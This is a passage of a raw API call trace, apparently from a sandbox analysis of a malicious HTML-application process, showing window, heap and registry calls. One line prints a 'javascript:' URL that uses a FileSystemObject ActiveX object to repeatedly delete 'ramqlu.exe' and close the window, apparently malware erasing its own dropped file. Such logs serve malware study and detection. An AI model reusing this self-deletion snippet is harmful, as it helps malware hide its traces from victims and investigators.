Msg=0x80, wParam=0x0, lParam=0x10027) returned 0x0 [0076.820] NtdllDefWindowProc_W () returned 0x0 [0076.820] SetWindowLongW (hWnd=0x3017c, nIndex=-16, dwNewLong=-2100363264) returned -2033254400 [0076.820] NtdllDefWindowProc_W () returned 0x0 [0076.820] NtdllDefWindowProc_W () returned 0x0 [0076.836] NtdllDefWindowProc_W () returned 0x10027 [0076.837] SetWindowLongW (hWnd=0x3017c, nIndex=-20, dwNewLong=262144) returned 262400 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.837] SetWindowPos (hWnd=0x3017c, hWndInsertAfter=0xfffffffe, X=0, Y=0, cx=0, cy=0, uFlags=0x37) returned 1 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.837] NtdllDefWindowProc_W () returned 0x0 [0076.838] NtdllDefWindowProc_W () returned 0x0 [0076.839] GlobalAddAtomW (lpString=0x0) returned 0x0 [0076.839] SetPropW (hWnd=0x4015e, lpString=0x0, hData=0x4015e) returned 0 [0076.839] ShowWindow (hWnd=0x3017c, nCmdShow=0) returned 0 [0076.839] UpdateWindow (hWnd=0x3017c) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.839] GetCurrentThreadId () returned 0x90 [0076.839] GetCurrentThreadId () returned 0x90 [0076.839] GetCurrentThreadId () returned 0x90 [0076.840] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf248 | out: lpPoint=0x2cf248) returned 1 [0076.840] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.840] GetCurrentThreadId () returned 0x90 [0076.840] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.840] GetCurrentThreadId () returned 0x90 [0076.840] GetFocus () returned 0x202a8 [0076.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x50) returned 0x44f520 [0076.841] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0076.841] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf278 | out: lpPoint=0x2cf278) returned 1 [0076.841] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.841] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.841] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf260 | out: lpPoint=0x2cf260) returned 1 [0076.842] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.842] GetCurrentThreadId () returned 0x90 [0076.842] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.842] GetCurrentThreadId () returned 0x90 [0076.842] IsWinEventHookInstalled (event=0x8005) returned 0 [0076.842] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned -9 [0076.842] StrCmpICW (pszStr1="about:blank", pszStr2="javascript:o=new ActiveXObject('Scripting.FileSystemObject');setInterval(function(){try{o.DeleteFile('ramqlu.exe');close()}catch(e){}},10);") returned -9 [0076.842] GetCurrentThreadId () returned 0x90 [0076.842] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf760 | out: lpPoint=0x2cf760) returned 1 [0076.843] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.843] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.843] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf740 | out: lpPoint=0x2cf740) returned 1 [0076.843] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.843] GetCurrentThreadId () returned 0x90 [0076.843] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.844] GetCurrentThreadId () returned 0x90 [0076.844] IsWinEventHookInstalled (event=0x8005) returned 0 [0076.844] GetCurrentThreadId () returned 0x90 [0076.844] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.844] NtdllDefWindowProc_W () returned 0x1 [0076.848] NtdllDefWindowProc_W () returned 0x0 [0076.848] NtdllDefWindowProc_W () returned 0x0 [0076.848] NtdllDefWindowProc_W () returned 0x0 [0076.848] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.848] GetParent (hWnd=0x202a8) returned 0x3017c [0076.848] GetParent (hWnd=0x3017c) returned 0x4015e [0076.848] GetParent (hWnd=0x4015e) returned 0x0 [0076.848] PostMessageW (hWnd=0x202a8, Msg=0x491, wParam=0x0, lParam=0x0) returned 1 [0076.848] GetMessageTime () returned 124769 [0076.848] GetMessagePos () returned 0x35603df [0076.848] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf4f8 | out: lpPoint=0x2cf4f8) returned 1 [0076.849] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf4f8 | out: lpPoint=0x2cf4f8) returned 1 [0076.849] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.849] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x28) returned 0x4535e8 [0076.849] GetCurrentThreadId () returned 0x90 [0076.849] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.850] GetCurrentThreadId () returned 0x90 [0076.850] GetCurrentThreadId () returned 0x90 [0076.850] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0076.850] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4535e8 | out: hHeap=0x410000) returned 1 [0076.850] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x8, wParam=0x0, lParam=0x0, plResult=0x2cf734 | out: plResult=0x2cf734) returned 0x1 [0076.850] NtdllDefWindowProc_W () returned 0x0 [0076.850] GetCurrentThreadId () returned 0x90 [0076.850] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.851] GetMessageTime () returned 124769 [0076.851] GetMessagePos () returned 0x35603df [0076.866] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x2cf344 | out: plResult=0x2cf344) returned 0x0 [0076.867] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.867] GetMessageTime () returned 124769 [0076.867] GetMessagePos () returned 0x35603df [0076.868] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0xf8) returned 0x47a2e8 [0076.869] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x282, wParam=0x1, lParam=0x0, plResult=0x2ced74 | out: plResult=0x2ced74) returned 0x0 [0076.869] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a2e8 | out: hHeap=0x410000) returned 1 [0076.869] GetCurrentThreadId () returned 0x90 [0076.869] GetCurrentThreadId () returned 0x90 [0076.869] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.869] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.869] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.869] GetAncestor (hwnd=0x202a8, gaFlags=0x2) returned 0x3017c [0076.869] IsIconic (hWnd=0x3017c) returned 0 [0076.869] GetCurrentThreadId () returned 0x90 [0076.869] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.869] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.869] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.870] GetFocus () returned 0x0 [0076.870] EnumChildWindows (hWndParent=0x202a8, lpEnumFunc=0x74e10a73, lParam=0x2cf764) returned 0 [0076.870] GetCurrentThreadId () returned 0x90 [0076.870] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf760 | out: lpPoint=0x2cf760) returned 1 [0076.870] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.871] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.871] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf740 | out: lpPoint=0x2cf740) returned 1 [0076.871] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0076.871] GetCurrentThreadId () returned 0x90 [0076.871] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0076.871] GetCurrentThreadId () returned 0x90 [0076.871] IsWinEventHookInstalled (event=0x8005) returned 0 [0076.871] GetCurrentThreadId () returned 0x90 [0076.871] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.872] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.872] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.872] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0076.872] KillTimer (hWnd=0x202a8, uIDEvent=0x1000) returned 1 [0076.872] GetCurrentThreadId () returned 0x90 [0076.872] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0076.872] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0076.872] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0076.872] KillTimer (hWnd=0x202ae, uIDEvent=0x2000) returned 1 [0076.872] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0076.872] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf628 | out: ppv=0x2cf628*=0x436988) returned 0x0 [0076.873] IUnknown:Release (This=0x436988) returned 0x1 [0076.873] GetCurrentThreadId () returned 0x90 [0076.873] GetCurrentThreadId () returned 0x90 [0076.873] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2a52fc0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x2cf2a4*="DeleteFile", cNames=0x1, lcid=0x409, rgDispId=0x2cf2c8 | out: rgDispId=0x2cf2c8*=1200) returned 0x0 [0076.874] FileSystemObject:IUnknown:AddRef (This=0x2a52fc0) returned 0x2 [0076.874] FileSystemObject:IDispatch:Invoke (in: This=0x2a52fc0, dispIdMember=1200, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x2cf26c*(rgvarg=([0]=0x2cf210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ramqlu.exe", varVal2=0x5813d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x2cf4a0, pExcepInfo=0x2cf280, puArgErr=0x2cf27c | out: pDispParams=0x2cf26c*(rgvarg=([0]=0x2cf210*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ramqlu.exe", varVal2=0x5813d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x2cf4a0*(varType=0x0, wReserved1=0x0, wReserved2=0xf500, wReserved3=0x2c, varVal1=0x0, varVal2=0x0), pExcepInfo=0x2cf280*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x2cf27c*=0x2a52fc0) returned 0x0 [0077.152] FileSystemObject:IUnknown:Release (This=0x2a52fc0) returned 0x1 [0077.152] GetCurrentThreadId () returned 0x90 [0077.152] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.153] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.153] ??2@YAPAXI@Z () returned 0x2a511b0 [0077.153] GetCurrentThreadId () returned 0x90 [0077.153] CoInternetIsFeatureEnabled (FeatureEntry=0x0, dwFlags=0x2) returned 0x0 [0077.153] PostMessageW (hWnd=0x3017c, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0077.153] GetCurrentThreadId () returned 0x90 [0077.153] GetCurrentThreadId () returned 0x90 [0077.154] ISystemDebugEventFire:IsActive (This=0x45f140) returned 0x1 [0077.154] ??3@YAXPAX@Z () returned 0x1 [0077.154] GetCurrentThreadId () returned 0x90 [0077.154] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x0, Size=0x10) returned 0x43f9f8 [0077.154] SetTimer (hWnd=0x202ae, nIDEvent=0x2001, uElapse=0xa, lpTimerFunc=0x0) returned 0x2001 [0077.154] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 1 [0077.154] TranslateMessage (lpMsg=0x2cfa74) returned 0 [0077.154] DispatchMessageW (lpMsg=0x2cfa74) returned 0x0 [0077.154] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf370 | out: lpPoint=0x2cf370) returned 1 [0077.155] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.155] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.155] ScreenToClient (in: hWnd=0x202a8, lpPoint=0x2cf200 | out: lpPoint=0x2cf200) returned 1 [0077.155] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.155] GetCurrentThreadId () returned 0x90 [0077.155] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.156] GetCurrentThreadId () returned 0x90 [0077.156] GetCurrentThreadId () returned 0x90 [0077.156] DestroyWindow (hWnd=0x3017c) returned 1 [0077.156] NtdllDefWindowProc_W () returned 0x0 [0077.156] PostQuitMessage (nExitCode=0) [0077.156] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0077.156] RevokeDragDrop (hwnd=0x202a8) returned 0x0 [0077.157] GetCurrentThreadId () returned 0x90 [0077.157] GetWindowLongW (hWnd=0x202a8, nIndex=-21) returned 4468680 [0077.157] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x445c90, hWnd=0x202a8, msg=0x82, wParam=0x0, lParam=0x0, plResult=0x2cf788 | out: plResult=0x2cf788) returned 0x1 [0077.157] NtdllDefWindowProc_W () returned 0x0 [0077.157] GetCurrentThreadId () returned 0x90 [0077.157] SetWindowLongW (hWnd=0x202a8, nIndex=-21, dwNewLong=0) returned 4468680 [0077.157] NtdllDefWindowProc_W () returned 0x0 [0077.157] GetMessageW (in: lpMsg=0x2cfa74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x2cfa74) returned 0 [0077.158] PostMessageW (hWnd=0x202ae, Msg=0x8002, wParam=0x0, lParam=0x0) returned 1 [0077.158] GetCurrentThreadId () returned 0x90 [0077.158] KillTimer (hWnd=0x202ae, uIDEvent=0x2001) returned 1 [0077.158] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fd08 | out: hHeap=0x410000) returned 1 [0077.158] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f9f8 | out: hHeap=0x410000) returned 1 [0077.158] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.158] ScreenToClient (in: hWnd=0x0, lpPoint=0x2cf820 | out: lpPoint=0x2cf820) returned 0 [0077.158] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.159] ScreenToClient (in: hWnd=0x0, lpPoint=0x2cf808 | out: lpPoint=0x2cf808) returned 0 [0077.159] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x30) returned 0x42d958 [0077.159] GetCurrentThreadId () returned 0x90 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d958 | out: hHeap=0x410000) returned 1 [0077.159] GetCurrentThreadId () returned 0x90 [0077.159] IsWinEventHookInstalled (event=0x8005) returned 0 [0077.159] GetCurrentThreadId () returned 0x90 [0077.159] CActiveIMMAppEx_Trident:IActiveIMMApp:Deactivate (This=0x445c90) returned 0x0 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x421a38 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a5a0 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42daa8 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4516d0 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.159] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] IntersectRect (in: lprcDst=0x2cf888, lprcSrc1=0x2cf888, lprcSrc2=0x2cf910 | out: lprcDst=0x2cf888) returned 1 [0077.160] IntersectRect (in: lprcDst=0x2cf920, lprcSrc1=0x2cf920, lprcSrc2=0x2cf888 | out: lprcDst=0x2cf920) returned 1 [0077.160] IntersectRect (in: lprcDst=0x2cf978, lprcSrc1=0x2cf978, lprcSrc2=0x2cf910 | out: lprcDst=0x2cf978) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x451ac0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459a70 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x459bc8 | out: hHeap=0x410000) returned 1 [0077.160] GetCurrentThreadId () returned 0x90 [0077.160] GetCurrentThreadId () returned 0x90 [0077.160] GetCurrentThreadId () returned 0x90 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453a08 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x452930 | out: hHeap=0x410000) returned 1 [0077.160] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f4c8 | out: hHeap=0x410000) returned 1 [0077.161] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf994 | out: phkResult=0x2cf994*=0x248) returned 0x0 [0077.161] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf998 | out: phkResult=0x2cf998*=0x24c) returned 0x0 [0077.161] RegOpenKeyExW (in: hKey=0x24c, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf954 | out: phkResult=0x2cf954*=0x0) returned 0x2 [0077.161] RegOpenKeyExW (in: hKey=0x248, lpSubKey="FEATURE_ADDITIONAL_IE8_MEMORY_CLEANUP", ulOptions=0x0, samDesired=0x1, phkResult=0x2cf954 | out: phkResult=0x2cf954*=0x0) returned 0x2 [0077.161] RegCloseKey (hKey=0x0) returned 0x6 [0077.161] RegCloseKey (hKey=0x0) returned 0x6 [0077.161] RegCloseKey (hKey=0x248) returned 0x0 [0077.161] RegCloseKey (hKey=0x24c) returned 0x0 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.161] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4707c0 | out: hHeap=0x410000) returned 1 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] GetCurrentThreadId () returned 0x90 [0077.161] GetCurrentThreadId () returned 0x90 [0077.162] IUnknown:Release (This=0x45f140) returned 0x1 [0077.162] GetCurrentThreadId () returned 0x90 [0077.162] GetCurrentThreadId () returned 0x90 [0077.162] GetCurrentThreadId () returned 0x90 [0077.162] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2cf988 | out: ppv=0x2cf988*=0x436988) returned 0x0 [0077.162] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] free (_Block=0x2a51058) [0077.163] free (_Block=0x2a51280) [0077.163] free (_Block=0x2a510a0) [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] free (_Block=0x2a52350) [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.163] ??3@YAXPAX@Z () returned 0x1 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.164] StdGlobalInterfaceTable:IGlobalInterfaceTable:RevokeInterfaceFromGlobal (This=0x76766460, dwCookie=0x100) returned 0x0 [0077.164] StdGlobalInterfaceTable:IUnknown:Release (This=0x58ffa0) returned 0x1 [0077.164] IUnknown:Release (This=0x436988) returned 0x1 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.164] IUnknown:Release (This=0x436988) returned 0x0 [0077.164] ISystemDebugEventFire:EndSession (This=0x45f140) returned 0x0 [0077.164] IUnknown:Release (This=0x45f140) returned 0x0 [0077.164] GetUserDefaultLCID () returned 0x409 [0077.164] GetACP () returned 0x4e4 [0077.164] ??3@YAXPAX@Z () returned 0x1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x46fb68 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4537c8 | out: hHeap=0x410000) returned 1 [0077.165] ??3@YAXPAX@Z () returned 0x1 [0077.165] GetCurrentThreadId () returned 0x90 [0077.165] free (_Block=0x2a52780) [0077.165] ??3@YAXPAX@Z () returned 0x1 [0077.165] ??3@YAXPAX@Z () returned 0x1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x470de8 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4707d8 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.165] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44f470 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x42d2a0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x453738 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f818 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43f968 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x472050 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4707f0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] IUnknown:Release (This=0x444c48) returned 0x0 [0077.166] IUnknown:Release (This=0x443704) returned 0x0 [0077.166] IUnknown:Release (This=0x750296bc) returned 0x1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x44a798 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x43fa10 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x410000) returned 1 [0077.166] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x47a428 | out: hHeap=0x410000) returned 1 [0077.166] CreateUri (in: pwzURI="about:blank", dwFlags=0x2b84, dwReserved=0x0, ppURI=0x2cfa2c | out: ppURI=0x2cfa2c*=0x43bc54) returned 0x0 [0077.167] IUri:GetScheme (in: This=0x43bc54, pdwScheme=0x2cf9c4 | out: pdwScheme=0x2cf9c4*=0x11) returned 0x0 [0077.167] IUnknown:QueryInterface (in: This=0x43bc54, riid=0x74cad6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, 